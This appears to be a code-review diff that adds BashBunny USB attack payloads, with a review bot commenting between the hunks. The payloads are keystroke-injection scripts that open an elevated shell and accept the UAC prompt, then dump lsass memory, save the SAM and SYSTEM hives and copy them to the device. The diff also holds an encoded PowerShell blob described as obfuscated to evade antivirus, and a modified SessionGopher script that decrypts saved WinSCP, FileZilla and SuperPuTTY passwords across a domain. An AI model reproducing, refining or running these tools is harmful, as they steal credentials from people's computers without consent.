䅍李灂䕁䅯䅒塂䑁䅁杢偂䕁䅍睓卂䝁䅫杖睁䡁䅯䅓ぁ䍁䅳睑䝂䕁䅑杓䙂䙁䅣杢硂䙁䅉䅓瑂䝁䅫杢穂䝁䅯党灂䝁䅫兙兂䝁䅅睔奂䡁䅙兕ㅁ䙁䅧睖楂䡁䅕睒湂䕁䅯杕䵂䕁䅫睌婂䕁䅑杓求䝁䄰䅣祁䕁䅣村㕁䑁䅣入楂䙁䅍兙あ䝁䅍督㍁䙁䅅䅓㙂䝁䅙䅕潂䕁䅑睡求䕁䅫杣慂䑁䅁督佂䡁䅙䅒求䕁䅫兤䉂䝁䅧䅕㕂䡁䅅䅢㍂䡁䅑杚ぁ䕁䅅睊杁䍁䅫䅉獁䙁䅳督㕂䙁䅍䅤求䝁䄰杌䩂䕁䄸杌䑂䕁䄸兢兂䙁䅉党呂䙁䅍兡偂䝁䄴杌橂䝁䄸兢睂䡁䅉兒呂䙁䅍兡偂䕁䄴兔療䕁䅑兒摂䑁䅯杏䕂䝁䅕睑偂䕁䄰䅣祂䝁䅕督呂䍁䅁克㡂䍁䅁杚偂䙁䅉兒桂䝁䅍䅡杁䡁䅳䅉畂䝁䅕睤瑁䕁䄸杙䭂䕁䅕睙啂䍁䅁䅉䩂䝁䄸杌穂䙁䅑杕求䕁䅅兔卂䝁䅕兑歂䝁䅕杕潁䍁䅑睘杁䍁䅷睗穂䡁䅫睕啂䝁䅕兢畁䡁䅑兒㑂䙁䅑杌求䝁䄴睑療䕁䅑兓畂䝁䅣兘㙁䑁䅯兙呂䕁䅍兓䩂䍁䅁克杁䡁䄰克畁䙁䅉兒䉂䕁䅑䅤療䕁䅕杢歂䍁䅧䅉灁䡁䅷兡畂䡁䅙睢䱂䕁䅕兌求䡁䅧䅣卂䕁䅕睕呂䝁䅫睢佂䅁㴽
|
|
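Review bot: this file is UTF-16 encoded, which is why it renders as CJK text here; read as UTF-16LE the first bytes are `&cls` followed by `powershell.exe -enc ...`, that is, the whole file is a base64-wrapped PowerShell command that cannot be reviewed in this form. Add the readable source the blob was generated from (the README for this payload says it is PowerSploit's Out-MiniDump) next to it, or a comment in payload.txt pointing at it, so a maintainer can verify what the encoded string does before merging.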
@ -0,0 +1,17 @@
|
|||
**Title: MiniDumpBunny**
|
||||
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
What is MiniDumpBunny?
|
||||
#
|
||||
*MiniDumpBunny uses Powersploits Out-MiniDump script to dump lsass. The script was rewritten, adapted for BashBunny usage and obfuscated in multiple ways to evade Antivirus.*
|
||||
#
|
||||
|
||||
**Instruction:**
|
||||
|
||||
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
|
||||
#
|
||||
Exfiltrate the .dmp file and read it with Mimikatz.
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
|
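Review bot: the README says the script was `obfuscated in multiple ways to evade Antivirus` but never says what `MiniBunny.bat` contains or where its plaintext source is, so a user has no way to audit what they are running with admin rights; link the original Out-MiniDump source and describe the encoding used. The bare `#` lines used as separators render as empty headings in Markdown; use `---` or a blank line. `Powersploits` should be `PowerSploit's`, and the image is linked from `0i41E/bashbunny-payloads` rather than this repository, so it breaks if that fork disappears.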
After Width: | Height: | Size: 60 KiB |
|
@ -0,0 +1,43 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: MiniDumpBunny
|
||||
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')"
|
||||
Q DELAY 250
|
||||
Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
||||
Q DELAY 250
|
||||
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
|
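Review bot: `Q ALT j` after the `RUN WIN "powershell Start-Process powershell -Verb runAs"` line is the German-layout accelerator for the UAC "Yes" button and only works together with `DUCKY_LANG de`; this copy carries no comment saying so (the ProcDumpBunny payload in the same commit does), and on any other layout the prompt is never accepted, so the `Q STRING` lines that follow are typed into the unelevated console. Document the dependency next to `DUCKY_LANG de`. The `mv *.dmp` in the second `Q STRING` line also moves every `.dmp` file in the elevated shell's working directory, not only the one just written; name the file explicitly as the ProcDumpBunny variant does with `out.dmp`.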
@ -0,0 +1,21 @@
|
|||
**Title: ProcDumpBunny**
|
||||
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
What is ProcDumpBunny?
|
||||
#
|
||||
*It is simple - using a renamed version of procdump - you are able to dump hashes from lsass.exe*
|
||||
#
|
||||
|
||||
**Instruction:**
|
||||
|
||||
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
|
||||
Place Bunny.exe in the same payload switch as your payload
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.dmp file and read it with Mimikatz.
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
|
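Review bot: the description `you are able to dump hashes from lsass.exe` does not describe what the payload does: ProcDump writes a process memory dump (`out.dmp`), and hashes are only obtained in the final step by reading that dump with Mimikatz, as the last instruction itself says. The instructions should also mention ProcDump's first-run EULA prompt, which the payload.txt in this commit does not handle (see the note there). `Executeable` should be `executable`, and the three screenshot links point at the `0i41E` fork rather than this repository.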
After Width: | Height: | Size: 8.7 KiB |
After Width: | Height: | Size: 78 KiB |
After Width: | Height: | Size: 61 KiB |
|
@ -0,0 +1,45 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: ProcDumpBunny
|
||||
# Description: Dump lsass.exe with a renamed version of procdump
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
#After you have adapted the delays for your target, add "-W hidden"
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
#Depending on your language - you need to change this - english layout: "Q ALT y" for example
|
||||
Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Bunny.exe -ma lsass.exe out.dmp')"
|
||||
Q DELAY 250
|
||||
Q STRING " ;mv out.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
||||
Q DELAY 250
|
||||
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
|
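Review bot: the typed command `Bunny.exe -ma lsass.exe out.dmp` does not pass `-accepteula`, so on a machine where Sysinternals ProcDump has never been run the EULA dialog opens and blocks the console, and the `Q STRING` lines that follow (the `mv out.dmp`, the `DONE` marker, the `Eject`) are typed into a prompt that is still waiting; the `Q DELAY 250` values also assume the dump is complete before the next fragment is typed. State this prerequisite in the header comments next to `# Attackmodes`. The `#After you have adapted the delays for your target, add "-W hidden"` comment should say which command the flag belongs to (`Start-Process`, as `-WindowStyle hidden`).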
@ -0,0 +1,24 @@
|
|||
**Title: SamDumpBunny**
|
||||
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
**What is SamDumpBunny?**
|
||||
#
|
||||
<p>SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.<br>
|
||||
Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
|
||||
|
||||
|
||||
**Instruction:**
|
||||
1. Plug in your Bashbunny and wait a few seconds
|
||||
|
||||
2. Unzip the exfiltrated zip file onto your machine.
|
||||
|
||||
3. Use a tool like samdump2 or pypykatz on your machine to extract the users hashes.
|
||||
> `samdump2 BunnySys BunnySam`
|
||||
or `pypykatz registry BunnySys --sam BunnySam`
|
||||
|
||||
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
|
||||
|
||||
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
|
|
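Review bot: the `<p>Author: 0i41E<br>` paragraph is never closed (the second `<p>` block is), which leaves the rendered README with unbalanced HTML; add `</p>` after `Version: 1.0<br>`. The text should say what the payload actually leaves on the Bunny (`SamDumpBunny.zip` in `loot`, per payload.txt) before step 2 tells the user to unzip it, and `the users sam and system hive` / `the users hashes` should read `the user's`. The screenshot is linked from `0i41E/omg-payloads/.../SamDumpCable`, a different repository and payload; copy the image into this payload's directory.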
@ -0,0 +1,53 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SamDumpBunny
|
||||
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
|
||||
#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
|
||||
Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC"
|
||||
Q DELAY 250
|
||||
Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA"
|
||||
Q DELAY 250
|
||||
Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu"
|
||||
Q DELAY 250
|
||||
Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl"
|
||||
Q DELAY 250
|
||||
Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA="
|
||||
Q DELAY 250
|
||||
Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel"
|
||||
Q DELAY 250
|
||||
Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
|
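Review bot: the `powershell.exe -NoP -enc ...` command is split across five `Q STRING` fragments with `Q DELAY 250` between them, and nothing on the page says what it does; the base64 decodes to `reg save hklm\sam BunnySam;reg save hklm\system BunnySys;Compress-Archive -Path "$PWD\BunnySys", "$PWD\BunnySam" -DestinationPath SamDumpBunny.zip;remove-item BunnySys;remove-item BunnySam;exit`, which matches the README, so put that plaintext in a header comment so reviewers can check the blob without decoding it (a single dropped character in any fragment makes the whole string fail to decode with no visible error). `Compress-Archive` exists only from PowerShell 5.0 onwards, so the header should note the Windows 10 / WMF 5 requirement. As in the MiniDumpBunny payload, `Q ALT j` is the German UAC accelerator; the `#Shortcut for pressing yes` comment here is the explanation the other copy lacks.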
@ -0,0 +1,22 @@
|
|||
**Title: SessionBunny**
|
||||
|
||||
Author: 0i41E
|
||||
(Credit for SessionGopher: Brandon Arvanaghi)
|
||||
|
||||
Version: 1.0
|
||||
|
||||
**Instruction:**
|
||||
|
||||
This payload will run the famous SessionGopher script, which was only slightly modified. Searches for PuTTY, WinSCP, and Remote Desktop saved sessions, decrypts saved passwords for WinSCP,
|
||||
Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords.
|
||||
After you recieve the information, save the items you are interested in simply on your BashBunny.
|
||||
|
||||
#
|
||||
|
||||
**Instruction:**
|
||||
|
||||
Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Wait for the script to finish and decide what you wanna do with the information gathered
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
|
|
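Review bot: the first `**Instruction:**` heading introduces a description, not instructions, and the same heading appears again below; rename the first to `**Description:**`. The description ends with `save the items you are interested in simply on your BashBunny` while the step list says `decide what you wanna do with the information gathered`; say whether the payload writes anything to `loot` automatically or only prints to the screen, since the script's `$OutCSV` switch in the hunk below defaults to off. `recieve` should be `receive` and `wanna` should be `want to`.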
@ -0,0 +1,948 @@
|
|||
function Invoke-SessionBunny
|
||||
{
|
||||
#>
|
||||
|
||||
[CmdletBinding()] Param (
|
||||
[Parameter(Position = 0, Mandatory = $False)]
|
||||
[String]
|
||||
$Computername,
|
||||
|
||||
[Parameter(Position= 1 , Mandatory = $False)]
|
||||
[String]
|
||||
$Credential,
|
||||
|
||||
[Parameter(Position= 2 , Mandatory = $False)]
|
||||
[Alias("iL")]
|
||||
[String]
|
||||
$Inputlist,
|
||||
|
||||
[Parameter(Position = 3, Mandatory = $False)]
|
||||
[Switch]
|
||||
$AllDomain,
|
||||
|
||||
[Parameter(Position = 4, Mandatory = $False)]
|
||||
[Switch]
|
||||
$Everything,
|
||||
|
||||
[Parameter(Position = 5, Mandatory = $False)]
|
||||
[Switch]
|
||||
$ExcludeDC,
|
||||
|
||||
[Parameter(Position = 6, Mandatory = $False)]
|
||||
[Switch]
|
||||
[Alias("o")]
|
||||
$OutCSV,
|
||||
|
||||
[Parameter(Position=8, Mandatory = $False)]
|
||||
[String]
|
||||
$OutputDirectory = "$pwd\SessionGopher-" + (Get-Date -Format o | foreach {$_ -replace ":", "."})
|
||||
)
|
||||
|
||||
Write-Output '
|
||||
o
|
||||
o
|
||||
o_
|
||||
/ ". SessionGopher
|
||||
," _-" Bunny Edition (0i41E)
|
||||
," m m
|
||||
..+ ) Brandon Arvanaghi
|
||||
`m..m @arvanaghi | arvanaghi.com
|
||||
'
|
||||
$ErrorActionPreference = "SilentlyContinue"
|
||||
#clear error listing
|
||||
$Error.clear()
|
||||
if ($OutCSV) {
|
||||
Write-Verbose "Creating directory $OutputDirectory."
|
||||
New-Item -ItemType Directory $OutputDirectory | Out-Null
|
||||
New-Item ($OutputDirectory + "\PuTTY.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\SuperPuTTY.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\WinSCP.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\FileZilla.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\RDP.csv") -Type File | Out-Null
|
||||
if ($Everything) {
|
||||
New-Item ($OutputDirectory + "\PuTTY ppk Files.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\Microsoft rdp Files.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\RSA sdtid Files.csv") -Type File | Out-Null
|
||||
}
|
||||
}
|
||||
|
||||
if ($Credential) {
|
||||
$Credentials = Get-Credential -Credential $Credential
|
||||
}
|
||||
|
||||
# Value for HKEY_USERS hive
|
||||
$HKU = 2147483651
|
||||
# Value for HKEY_LOCAL_MACHINE hive
|
||||
$HKLM = 2147483650
|
||||
|
||||
$PuTTYPathEnding = "\SOFTWARE\SimonTatham\PuTTY\Sessions"
|
||||
$WinSCPPathEnding = "\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
|
||||
$RDPPathEnding = "\SOFTWARE\Microsoft\Terminal Server Client\Servers"
|
||||
|
||||
if ($Inputlist -or $AllDomain -or $ComputerName) {
|
||||
|
||||
# Whether we read from an input file or query active directory
|
||||
$Reader = ""
|
||||
|
||||
if ($AllDomain) {
|
||||
Write-Verbose "Getting member computers in the domain."
|
||||
$Reader = GetComputersFromActiveDirectory
|
||||
} elseif ($Inputlist) {
|
||||
Write-Verbose "Reading the list of targets."
|
||||
$Reader = Get-Content ((Resolve-Path $Inputlist).Path)
|
||||
} elseif ($ComputerName) {
|
||||
Write-Verbose "Setting target computer as $ComputerName."
|
||||
$Reader = $ComputerName
|
||||
}
|
||||
|
||||
$optionalCreds = @{}
|
||||
if ($Credentials) {
|
||||
$optionalCreds['Credential'] = $Credentials
|
||||
}
|
||||
|
||||
foreach ($RemoteComputer in $Reader) {
|
||||
|
||||
if ($AllDomain) {
|
||||
# Extract just the name from the System.DirectoryServices.SearchResult object
|
||||
$RemoteComputer = $RemoteComputer.Properties.name
|
||||
}
|
||||
if ($RemoteComputer) {
|
||||
Write-Output "Digging on" $RemoteComputer"..."
|
||||
|
||||
$SIDS = Invoke-WmiMethod -Class 'StdRegProv' -Name 'EnumKey' -ArgumentList $HKU,'' -ComputerName $RemoteComputer @optionalCreds | Select-Object -ExpandProperty sNames | Where-Object {$_ -match 'S-1-5-21-[\d\-]+$'}
|
||||
|
||||
foreach ($SID in $SIDs) {
|
||||
|
||||
# Get the username for SID we discovered has saved sessions
|
||||
$MappedUserName = try { (Split-Path -Leaf (Split-Path -Leaf (GetMappedSID))) } catch {}
|
||||
$Source = (($RemoteComputer + "\" + $MappedUserName) -Join "")
|
||||
|
||||
# Created for each user found. Contains all sessions information for that user.
|
||||
$UserObject = New-Object PSObject
|
||||
|
||||
<#
|
||||
PuTTY: contains hostname and usernames
|
||||
SuperPuTTY: contains username, hostname, relevant protocol information, decrypted passwords if stored
|
||||
RDP: contains hostname and username of sessions
|
||||
FileZilla: hostname, username, relevant protocol information, decoded passwords if stored
|
||||
WinSCP: contains hostname, username, protocol, deobfuscated password if stored and no master password used
|
||||
#>
|
||||
$ArrayOfPuTTYSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfSuperPuTTYSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfRDPSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfFileZillaSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfWinSCPSessions = New-Object System.Collections.ArrayList
|
||||
|
||||
# Construct tool registry/filesystem paths from SID or username
|
||||
$RDPPath = $SID + $RDPPathEnding
|
||||
$PuTTYPath = $SID + $PuTTYPathEnding
|
||||
$WinSCPPath = $SID + $WinSCPPathEnding
|
||||
$SuperPuTTYFilter = "Drive='C:' AND Path='\\Users\\$MappedUserName\\Documents\\SuperPuTTY\\' AND FileName='Sessions' AND Extension='XML'"
|
||||
$FileZillaFilter = "Drive='C:' AND Path='\\Users\\$MappedUserName\\AppData\\Roaming\\FileZilla\\' AND FileName='sitemanager' AND Extension='XML'"
|
||||
|
||||
$RDPSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$RDPPath @optionalCreds
|
||||
$PuTTYSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$PuTTYPath @optionalCreds
|
||||
$WinSCPSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$WinSCPPath @optionalCreds
|
||||
$SuperPuTTYPath = (Get-WmiObject -Class 'CIM_DataFile' -Filter $SuperPuTTYFilter -ComputerName $RemoteComputer @optionalCreds | Select Name)
|
||||
$FileZillaPath = (Get-WmiObject -Class 'CIM_DataFile' -Filter $FileZillaFilter -ComputerName $RemoteComputer @optionalCreds | Select Name)
|
||||
|
||||
# If any WinSCP saved sessions exist on this box...
|
||||
if (($WinSCPSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {
|
||||
Write-Verbose "Found saved WinSCP sessions."
|
||||
# Get all sessions
|
||||
$WinSCPSessions = $WinSCPSessions | Select-Object -ExpandProperty sNames
|
||||
|
||||
foreach ($WinSCPSession in $WinSCPSessions) {
|
||||
|
||||
$WinSCPSessionObject = "" | Select-Object -Property Source,Session,Hostname,Username,Password
|
||||
$WinSCPSessionObject.Source = $Source
|
||||
$WinSCPSessionObject.Session = $WinSCPSession
|
||||
|
||||
$Location = $WinSCPPath + "\" + $WinSCPSession
|
||||
|
||||
$WinSCPSessionObject.Hostname = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"HostName" @optionalCreds).sValue
|
||||
$WinSCPSessionObject.Username = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"UserName" @optionalCreds).sValue
|
||||
$WinSCPSessionObject.Password = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"Password" @optionalCreds).sValue
|
||||
|
||||
if ($WinSCPSessionObject.Password) {
|
||||
|
||||
$MasterPassPath = $SID + "\Software\Martin Prikryl\WinSCP 2\Configuration\Security"
|
||||
|
||||
$MasterPassUsed = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetDWordValue -ArgumentList $HKU,$MasterPassPath,"UseMasterPassword" @optionalCreds).uValue
|
||||
|
||||
if (!$MasterPassUsed) {
|
||||
$WinSCPSessionObject.Password = (DecryptWinSCPPassword $WinSCPSessionObject.Hostname $WinSCPSessionObject.Username $WinSCPSessionObject.Password)
|
||||
} else {
|
||||
$WinSCPSessionObject.Password = "Saved in session, but master password prevents plaintext recovery"
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
[void]$ArrayOfWinSCPSessions.Add($WinSCPSessionObject)
|
||||
|
||||
} # For Each WinSCP Session
|
||||
|
||||
if ($ArrayOfWinSCPSessions.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "WinSCP Sessions" -Value $ArrayOfWinSCPSessions
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfWinSCPSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\WinSCP.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "WinSCP Sessions"
|
||||
$ArrayOfWinSCPSessions | Select-Object * | Format-List | Out-String
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
} # If path to WinSCP exists
|
||||
|
||||
if (($PuTTYSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {
|
||||
Write-Verbose "Found saved PuTTY sessions."
|
||||
# Get all sessions
|
||||
$PuTTYSessions = $PuTTYSessions | Select-Object -ExpandProperty sNames
|
||||
|
||||
foreach ($PuTTYSession in $PuTTYSessions) {
|
||||
|
||||
$PuTTYSessionObject = "" | Select-Object -Property Source,Session,Hostname
|
||||
|
||||
$Location = $PuTTYPath + "\" + $PuTTYSession
|
||||
|
||||
$PuTTYSessionObject.Source = $Source
|
||||
$PuTTYSessionObject.Session = $PuTTYSession
|
||||
$PuTTYSessionObject.Hostname = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"HostName" @optionalCreds).sValue
|
||||
|
||||
[void]$ArrayOfPuTTYSessions.Add($PuTTYSessionObject)
|
||||
|
||||
}
|
||||
|
||||
if ($ArrayOfPuTTYSessions.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "PuTTY Sessions" -Value $ArrayOfPuTTYSessions
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfPuTTYSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "PuTTY Sessions"
|
||||
$ArrayOfPuTTYSessions | Select-Object * | Format-List | Out-String
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
} # If PuTTY session exists
|
||||
|
||||
if (($RDPSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {
|
||||
Write-Verbose "Found saved RDP sessions."
|
||||
# Get all sessions
|
||||
$RDPSessions = $RDPSessions | Select-Object -ExpandProperty sNames
|
||||
|
||||
foreach ($RDPSession in $RDPSessions) {
|
||||
|
||||
$RDPSessionObject = "" | Select-Object -Property Source,Hostname,Username
|
||||
|
||||
$Location = $RDPPath + "\" + $RDPSession
|
||||
|
||||
$RDPSessionObject.Source = $Source
|
||||
$RDPSessionObject.Hostname = $RDPSession
|
||||
$RDPSessionObject.Username = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"UserNameHint" @optionalCreds).sValue
|
||||
|
||||
[void]$ArrayOfRDPSessions.Add($RDPSessionObject)
|
||||
|
||||
}
|
||||
|
||||
if ($ArrayOfRDPSessions.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Sessions" -Value $ArrayOfRDPSessions
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfRDPSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\RDP.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "Microsoft RDP Sessions"
|
||||
$ArrayOfRDPSessions | Select-Object * | Format-List | Out-String
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
} # If RDP sessions exist
|
||||
|
||||
# If we find the SuperPuTTY Sessions.xml file where we would expect it
|
||||
if ($SuperPuTTYPath.Name) {
|
||||
Write-Verbose "Found SupePuTTY sessions.xml"
|
||||
$File = "C:\Users\$MappedUserName\Documents\SuperPuTTY\Sessions.xml"
|
||||
$FileContents = DownloadAndExtractFromRemoteRegistry $File
|
||||
|
||||
[xml]$SuperPuTTYXML = $FileContents
|
||||
(ProcessSuperPuTTYFile $SuperPuTTYXML)
|
||||
|
||||
}
|
||||
|
||||
# If we find the FileZilla sitemanager.xml file where we would expect it
|
||||
if ($FileZillaPath.Name) {
|
||||
Write-Verbose "Found FileZilaa sitemanager.xml"
|
||||
$File = "C:\Users\$MappedUserName\AppData\Roaming\FileZilla\sitemanager.xml"
|
||||
$FileContents = DownloadAndExtractFromRemoteRegistry $File
|
||||
|
||||
[xml]$FileZillaXML = $FileContents
|
||||
(ProcessFileZillaFile $FileZillaXML)
|
||||
|
||||
} # FileZilla
|
||||
|
||||
} # for each SID
|
||||
|
||||
if ($Everything) {
|
||||
Write-Verbose "Running the every test. Reading files on the target machine. This may take few minutes."
|
||||
$ArrayofPPKFiles = New-Object System.Collections.ArrayList
|
||||
$ArrayofRDPFiles = New-Object System.Collections.ArrayList
|
||||
$ArrayofsdtidFiles = New-Object System.Collections.ArrayList
|
||||
|
||||
$FilePathsFound = (Get-WmiObject -Class 'CIM_DataFile' -Filter "Drive='C:' AND extension='ppk' OR extension='rdp' OR extension='.sdtid'" -ComputerName $RemoteComputer @optionalCreds | Select Name)
|
||||
|
||||
